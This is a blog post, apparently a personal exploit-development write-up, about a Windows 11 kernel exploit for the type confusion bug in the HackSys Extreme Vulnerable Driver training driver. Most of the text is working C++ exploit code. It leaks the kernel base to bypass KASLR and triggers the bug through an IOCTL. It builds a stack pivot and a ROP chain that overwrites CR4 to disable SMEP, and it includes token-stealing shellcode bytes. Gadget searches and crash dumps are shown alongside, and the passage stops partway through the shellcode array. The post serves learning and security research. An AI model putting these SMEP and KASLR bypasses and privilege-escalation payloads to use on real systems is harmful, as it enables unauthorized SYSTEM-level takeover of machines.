❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

How a simple K-TypeConfusion took me 3 months long to create a exploit?

6 August 2023 at 13:10

How a simple K-TypeConfusion took me 3 months long to create a exploit? [HEVD] - Windows 11 (buildΒ 22621)

Have you ever tested something for a really long time, that it made part of your life? that’s what happen to me for the last months when a simple TypeConfusionvulnerability almost made me goΒ crazy!

Introduction

In this blogpost, we will talk about my experience covering a simple vulnerability that for some reason was the most hard and confuse thing that i ever have seen in a context of Kernel Exploitaiton.

We will cover about the followΒ topics:

  • TypeConfusion: We will discuss how this vulnerability impact in windows kernel, and as a researcher how we can manipulate and implement an exploit from User-Landin order to get Privileged Access on the operation system.
  • ROPchain: Method to make RIPregister jump through windows kernel addresses, in order to execute code. With this technique, we can actually manipulate the order of execution of our Stack, and thenceforth get access into the User-Land Shellcode.
  • Kernel ASLR Bypass: Way to Leakkernel memory addresses, and with the correct base address, we’re able to calculatethe memory region which we want to use posteriorly.
  • Supervisor Mode Execution Prevention (SMEP): Basically a mechanism that block all execution from user-land addresses, if it is enabled in operation system, you can’t JMP/CALLinto User-Land, so you can’t simply direct execute your shellcode. This protection come since Windows 8.0 (32/64 bits)Β version.
  • Kernel Memory Managment: Important informations about how Kernel interprets memory, including: Memory Paging, Segmentations,Data Transfer, etc. Also, a description of how memory uses his data during Operation SystemΒ Layout.
  • Stack Manipulation: Stack is the most notorious thing that you will see in this blogpost, all my research lies on it, and after reboot myVM million times, i actually can understand a little bit some concepts that you must consider when writing a Stack BasedΒ exploit.

VM Setup

OS Name:                   Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys

Tips for Kernel Exploitation coding

Default windows functions most of the time can delay a exploitation development, because most of these functions should have β€œprotected values” with a view to preveting misuse from attackers or people who want to modify/manipulateinternal values. According many C/C++scripts, you can find a import asΒ follows:

#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>

When a inclusion of winternl.h file is made, default values of β€œinnumerous” functions are overwritten with the values defined on structson theΒ library.

// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>

The problem is, when you manipulating and exploiting functions from User-Land like NtQuerySystemInformationin β€œrecent” windows versions, these defined values are β€œdifferent”, blocking and preveting the use of it functions which can have some ability to leak kernel base addresses, consequently delaying our exploitation phase. So, it’s import to make sure that a code is crafted by ignoring winternl.h and posteriorly by utilizing manually structs definitions as exampleΒ below:

#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>

#define QWORD uint64_t

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);

// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

INT64 GetKernelBase() {
// Leak NTDLL.sys base address in order to KASLR bypass
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}

With this technique, now we’re able to use all correct structsvalues without any troubles.

TypeConfusion vulnerability

Utilizing IDA Reverse Engineering Tool, we can clearly see the correct IOCTLwhich execute our vulnerable function.

0x222023 IOCTL to execute our TypeConfusionIoctlHandler

After reversing TriggerTypeConfusion, we have the followΒ code:

// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}

As you can see, the function is expecting two values from a user-controlled struct named _KERNEL_TYPE_CONFUSION_OBJECT, this struct contains (ObjectID, ObjectType)as parameters, and after parse these objects, it utilizes TypeConfusionObjectInitializerwith our objects. The vulnerable code follows asΒ bellow:

__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}

The vulnerability in the code above is implict behind the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectTypewhich pointer to an user-controlled address.

Exploit Initialization

Knowing about our vulnerability, now we’ll get focused into exploitΒ phases.

First of all, we craft our code in order to communicate to our HEVDdriver IRPutilizing previously got IOCTL -> 0x22202, and after that send our malicious buffer.

<...snip...>
// ---> Malicious Struct <---
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};

HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
exploit();
return 0;
}

Then after we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECTshould be likeΒ this.

0xdeadbeefdeadbeef address is our callback for theΒ moment
[CALL]ing 0xdeadbeefdeadbeef

Now we can cleary understand where exactly this vulnerability lies. The next step should be to JMP into our user-controlled buffer containing some shellcode that can escalate SYSTEM PRIVILEGES, the issue with this idea lies behind a protection mechanism called SMEP. Supervisor Mode Execution Prevention, a.k.aΒ (SMEP).

Supervisor Mode Execution Prevention (SMEP)

The main idea behind SMEPprotection is to preveting CALL/JMP into user-landaddresses. If SMEPkernel bitis set to [1], it provides a security mechanism that protectmemory pages from userΒ attacks.

According to Core Security,

SMEP: Supervisor Mode Execution Prevention allows pages to
be protected from
supervisor-mode instruction fetches. If
SMEP = 1, software operating in supervisor mode cannot
fetch instructions from linear addresses that are accessible in
userΒ mode
- Detects RING-0 code running in USER SPACE
- Introduced at
Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since
Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially
"Local Privilege Escalation” exploits
must now consider thisΒ feature.

Then let’s see in a pratical test if it is actually working properly.

<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>

After exploit execution we got something likeΒ this:

SMEP seems to be workingΒ properly

The BugCheckanalysis should be similar as aΒ follows:

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>

As we can see, SMEPprotection looks working right, the follow steps will cover how do we can manipulate our addresses in order to enable our shellcode buffer to be executed by processor.

Returned-Oriented-Programming againstΒ SMEP

Returned-Oriented-Programminga.k.a (ROP), is technique that allows any attacker to manipulate the instruction pointers and returned addresses in the current stack, with this type of attack, we can actually perform a programming assembly only with execution between address toΒ address.

As CTF101 mentioned:

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complexΒ things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwritesaved instruction pointers, giving us control over what the program does next. Most programs don’t have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us ourΒ shell.

The main idea for our exploit lies behind the utilization of a ROP chain with a view to achieve arbitrary code execution. ButΒ how?

x64 CR4Β register

As part of a Control Registers, CR4register basically holds a bit value that can changes between Operation Systems.

When SMEPis implemented, a default value is used in the current OS to check if SMEP still enabled, and with this information kernel can knows if through his execution, should be possible or not to CALL/JMPinto user-land addresses.

As Wikipedia says:

A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.

In my Operation System Build Windows 11 22621we can cleary see this register value inΒ WinDBG:

CR4 value before ROPΒ Chain

At now, the main idea is about to flipthe correct bit, in order to neutralize SMEP execution, and after that JMPinto attacker shellcode.

SMEP turning off through bit flip: 001[1]0101 -> 001[0]0101

Now, with this in mind, we need get back into our exploit source-code, and craft our ROP chainto achieve our goal. The question is,Β how?

At now, we know that we need change CR4value and a ROP chaincan help us, also we actually need at first to bypass Kernel ASLRdue the randomization between addresses in this land. The follow steps we’ll cover how to get the correct gadgetsto followΒ attacks.

Virtualization-based securityΒ (VBS)

With CR4register manipulation through ROP chainattacks, it’s important to notice that when a miscalculation is done by an attacker in the bit change exploit phase,if Virtualization-based securitybit is enabled, system catch exception and crashes after a change attempt of CR4 registerΒ value.

According to Microsoft:

Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEPfield, are blocked instantly.

If for some reason, you see an error as below, it’s a probably miscalculation of a the value which should be placed into CR4register.

<...snip...>
// A example of miscalculation of CR4 address
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>

WinDBG output:

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.

Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409

KASLR Bypass with NtQuerySystemInformation

NtQuerySystemInformationAs mentioned before, is a function that if configured correctly can leak kernel lib base addresses once perform system query operations. As return of these queries, we can actually leak memory from user-land.

As mentioned by TrustedWave:

The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscallΒ IDs.
<…snip…>
The function basically retrieves specific information from the environment and its structure is veryΒ simple
<…snip…>Β΄
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects andΒ others.

So, now we have a question, if we can leakaddresses and calculate the correct offset of the base of these addresses to our gadget, how can we search in memory for theseΒ ones?

The solution is simple asΒ follows:

1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt

With the file ROP.txt, we have addresses but we’re still β€œunable” to get the correct ones to implement a valid calculation.

Ntdllfor exemple, utilizes addresses from his module as β€œbuffers” sometimes, and the data can point for another invalid one. At kernel level, functions β€œchanges”, and between all these β€œchanges” you will never hit the correct offset through a simpleΒ .writememdump.

The biggest issue lies behind when aΒ .writemem is used, it dumps the start and end of a defined module, but it automatically don’t align correctly the offset of functions. It happens due module segmentsand malleable data which can change time by time for the properly OS workΒ . For example, if we search for opcodesutilizing WinDBGcommand line, there’s a static buffer address which returns exatcly the opcodes that weΒ send.

WinDBG opcode searching

The addresses above seems to be valid, and they are identical due our opcodes, the problem is that 0xffffff80051ef8500 is a buffer and it returns everything we put into WinDBGsearch function [s command]. So, no matter how you changesopcode, it always returns back in aΒ buffer.

WinDBG opcode searching

Ok, now let’s say that ROPGadget.py return as the followΒ output:

--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret

If we try to check if that opcodesare the same in our current VM, we’ll notice something likeΒ this:

Inspecting 0xfffff800516a6ac4 address

As you can see, the offset fromΒ .writememis invalid, meaning that something went wrong. A simple fix for this issue is by looking into our ROPGadgetsand see what assembly code that we need, and thenceforth we convert this code into opcode, so with that we can freely search into current valid memory the addresses to start our ROPΒ chain.

4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0

Now we know that ntdll base address 0xffffff8005120000 + 0x00000000002ce4c0will result into nt!ExfReleasePushLock+0x20function.

Stack Pivoting & ROPΒ chain

With previously idea of what exatcly means aROP chain, now it’s important to know what gadget do we need to change CR4register value utlizing only kernel addresses.

STACK PIVOTING:
mov esp, 0x48000000

ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one

// The logic for the ROP chain
// 1 - Allocate memory in 0x48000000 region
// 2 - When we moves 0x48000000 address to our ESP/RSP register
we actually can manipulated the range of addresses that we'll [CALL/JMP].

Now knowing about ourROP chain logic, we need to discuss about Stack Pivoting technique.

Stack pivoting basically means the changes of current Kernel stack into a user-controlled Fake Stack, this modification can be possible by changing RSP register value. When we changes RSP value to a user-controlled stack, we can actually manipulate it execution through a ROP chain, once we can do a programming returning into kernel addresses.

Getting back into the code, we implement our attacker FakeΒ Stack.

<...snip...>
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RDX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RDX;
std::cout << "[+] MOV_CR4_RDX: 0x" << std::hex << POP_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
